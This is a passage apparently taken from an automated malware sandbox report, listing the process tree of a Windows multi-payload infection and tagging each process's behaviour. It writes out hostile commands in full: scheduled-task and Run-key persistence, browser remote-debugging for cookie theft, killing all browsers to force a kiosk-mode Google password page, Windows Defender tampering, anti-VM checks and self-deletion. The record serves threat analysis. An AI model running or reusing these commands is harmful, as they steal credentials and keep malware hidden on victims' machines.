C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E5⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\543648\Legend.pifLegend.pif E5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:112 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
PID:2208 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1644
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1920
-
-
C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe6⤵
- Executes dropped EXE
PID:2900
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\up.exe"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:1772 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp950F.tmp.bat""4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2784
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1804 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2892 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec97785⤵PID:2992
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:25⤵PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:85⤵PID:3024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:85⤵PID:1944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsIEHDAFHDHC.exe"4⤵
- Loads dropped DLL
PID:1028 -
C:\Users\Admin\DocumentsIEHDAFHDHC.exe"C:\Users\Admin\DocumentsIEHDAFHDHC.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3008 -
C:\Users\Admin\AppData\Local\Temp\1009118001\x4lburt.exe"C:\Users\Admin\AppData\Local\Temp\1009118001\x4lburt.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:2724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe"C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:316 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6689758,0x7fef6689768,0x7fef66897789⤵PID:1064
-
-
C:\Windows\system32\ctfmon.exectfmon.exe9⤵PID:1928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:29⤵PID:1756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:89⤵PID:1880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:89⤵PID:1184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2052 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:19⤵
- Uses browser remote debugging
PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2076 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:19⤵
- Uses browser remote debugging
PID:1060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1456 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:29⤵PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3288 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:19⤵
- Uses browser remote debugging
PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe" & rd /s /q "C:\ProgramData\JEBFIIIEHCFH" & exit8⤵
- System Location Discovery: System Language Discovery
PID:3164 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:344
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1009351041\PeRVAzl.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\1009360001\17b5adcd83.exe"C:\Users\Admin\AppData\Local\Temp\1009360001\17b5adcd83.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\1009361001\a077d9ad88.exe"C:\Users\Admin\AppData\Local\Temp\1009361001\a077d9ad88.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\1009362001\fdf86a2bc0.exe"C:\Users\Admin\AppData\Local\Temp\1009362001\fdf86a2bc0.exe"7⤵
- Executes dropped EXE
PID:3812 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:3944
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3572 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.0.2108510249\590262049" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1164 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18e0919-0b06-482f-8693-fc3dc9632d7b} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1316 112d7558 gpu10⤵PID:4068
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.1.303882532\1085548684" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1508 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b76021f-4268-4edb-b7d4-8dbe95419877} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1524 f1faa58 socket10⤵PID:2568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.2.1187441485\1262172096" -childID 1 -isForBrowser -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e46967-3216-494d-a9e9-79f7236a5362} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2476 11260058 tab10⤵PID:3216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.3.117679410\1370028322" -childID 2 -isForBrowser -prefsHandle 2928 -prefMapHandle 2924 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {128e9118-beed-402e-a8fa-d673de43a396} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2940 1c115758 tab10⤵PID:3340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.4.1437272989\434179208" -childID 3 -isForBrowser -prefsHandle 3532 -prefMapHandle 3256 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0af75d6-de5a-4ba0-9495-37280431c200} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1188 1b080958 tab10⤵PID:3384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.5.475500992\1052355102" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3720 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0682d68e-e6dd-4002-8540-a0282ff64824} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 3816 1b07f458 tab10⤵PID:3716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.6.2006154946\844683251" -childID 5 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9de6d57-e20e-402c-a5e9-8ffc1ede1bea} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 3984 1b081e58 tab10⤵PID:3424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.7.37491117\1833654595" -childID 6 -isForBrowser -prefsHandle 2552 -prefMapHandle 2556 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5af5b30d-3896-445a-a3a9-393166a91d34} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2532 1d6c3b58 tab10⤵PID:1100
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.8.1931474314\1213694255" -childID 7 -isForBrowser -prefsHandle 1112 -prefMapHandle 2584 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be35ea03-9fce-4d7f-a3fd-5a409b4a5b8d} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2364 184cb558 tab10⤵PID:3652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.9.49933002\1994294668" -parentBuildID 20221007134813 -prefsHandle 4508 -prefMapHandle 4504 -prefsLen 26796 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d97130c-d27f-434f-9df6-8a2f3e4f3f00} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 4520 227a1e58 rdd10⤵PID:2612
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.10.82216082\637417715" -childID 8 -isForBrowser -prefsHandle 4620 -prefMapHandle 4616 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e70e01f-4698-46fe-843b-36341a60dde0} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 4632 227a4558 tab10⤵PID:3376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.11.602118539\106706448" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 8764 -prefMapHandle 4740 -prefsLen 26796 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66efaeb0-bbb3-4307-afb8-84fef1546c0c} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 8752 23154e58 utility10⤵PID:3628
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009363001\32b1c3a712.exe"C:\Users\Admin\AppData\Local\Temp\1009363001\32b1c3a712.exe"7⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1516 -
C:\Program Files\Maza\maza-qt.exe"C:\Program Files\Maza\maza-qt.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2328
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\2892715595.exeC:\Users\Admin\AppData\Local\Temp\2892715595.exe4⤵
- Executes dropped EXE
PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"3⤵
- Executes dropped EXE
PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1404 -
C:\Program Files\Google\Chrome\Application\HKZINHMZHBGY0.exe"C:\Program Files\Google\Chrome\Application\HKZINHMZHBGY0.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe"C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4256 -
C:\Users\Admin\AppData\Roaming\CCU5HWRV8s.exe"C:\Users\Admin\AppData\Roaming\CCU5HWRV8s.exe"5⤵
- Executes dropped EXE
PID:4380
-
-
C:\Users\Admin\AppData\Roaming\oPK9X0q98z.exe"C:\Users\Admin\AppData\Roaming\oPK9X0q98z.exe"5⤵
- Executes dropped EXE
PID:4408
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 524⤵
- Program crash
PID:4320
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\key.exe"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"3⤵
- Executes dropped EXE
PID:2240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 1284⤵
- Program crash
PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"3⤵
- Executes dropped EXE
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"4⤵
- Executes dropped EXE
PID:3368
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"3⤵
- Executes dropped EXE
PID:3604
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3580
-
-
C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"3⤵
- Executes dropped EXE
PID:3372
-
-
C:\Users\Admin\AppData\Local\Temp\Files\nguyentri38.exe"C:\Users\Admin\AppData\Local\Temp\Files\nguyentri38.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
